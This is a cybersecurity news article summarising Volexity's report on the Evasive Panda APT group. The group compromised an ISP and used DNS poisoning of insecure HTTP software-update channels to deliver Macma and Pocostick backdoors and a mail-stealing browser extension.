Researchers have discovered that a China-linked advanced persistent threat (APT) group compromised an Internet service provider (ISP) to exploit software vendor update mechanisms through DNS poisoning. This attack delivered new variants of the Macma backdoor, as well as post-exploitation malware aimed at exfiltrating sensitive data from compromised networks.
The attack, attributed to the threat group Evasive Panda, also known as StormBamboo and DaggerFly, was detected by researchers at Volexity after multiple systems were found infected with malware in mid-2023. According to a recent blog post by Volexity, the researchers traced the attacks back to a highly active Chinese APT group that manipulated DNS query responses for specific domains associated with automatic software update channels for software vendors.
The Volexity researchers, including Ankur Saini, Paul Rascagneres, Steven Adair, and Thomas Lancaster, stated that StormBamboo targeted software utilizing insecure update mechanisms, such as HTTP, and failed to validate digital signatures of installers. Consequently, when these applications sought updates, they unwittingly installed malware, including variants of Macma and Pocostick (aka MGBot).
Macma, a backdoor commonly used by Evasive Panda, was first identified by Google TAG in 2021 and has since evolved to integrate with Gimmick MacOS malware. Post-exploitation activities included deploying a malicious browser extension called Reloadext to extract mail data from victims.
In one of the incidents investigated, Evasive Panda exploited DNS poisoning to deliver malware via an HTTP automatic update mechanism. This attack tainted responses for legitimate hostnames, which were then utilized as second-stage command-and-control (C2) servers by the threat actors. DNS poisoning involves manipulating DNS records to reroute network communications to a server controlled by the attacker, facilitating the theft and manipulation of information transmitted to users.
The researchers highlighted that the abuse of automatic updates was consistent across the targeted applications. Legitimate applications would make HTTP requests to retrieve a text-based file containing the latest version and an installer link. By controlling DNS responses, attackers redirected these requests to C2 servers hosting fake text files and malicious installers.
Evasive Panda’s attack campaign targeted several software vendors with insecure update workflows, exploiting varying levels of complexity in their malware distribution processes. For example, the attacker used DNS poisoning to host a modified config file for 5Kplayer, prompting the application to download a backdoored upgrade package disguised as a legitimate update.
After collaborating with the compromised ISP and addressing the malicious activity, Volexity emphasized the sophisticated nature of Evasive Panda’s attacks and their tendency to compromise third parties to reach primary targets. The group has been previously associated with hijacking software update channels to distribute malware, showcasing a high level of skill and aggressiveness in its cyber espionage operations.
The researchers provided various rules and indicators of compromise (IOCs) in their report to help organizations identify potential impacts of the malicious activity. This incident serves as a reminder of the evolving tactics used by advanced threat actors to exploit vulnerabilities in software update mechanisms for nefarious purposes.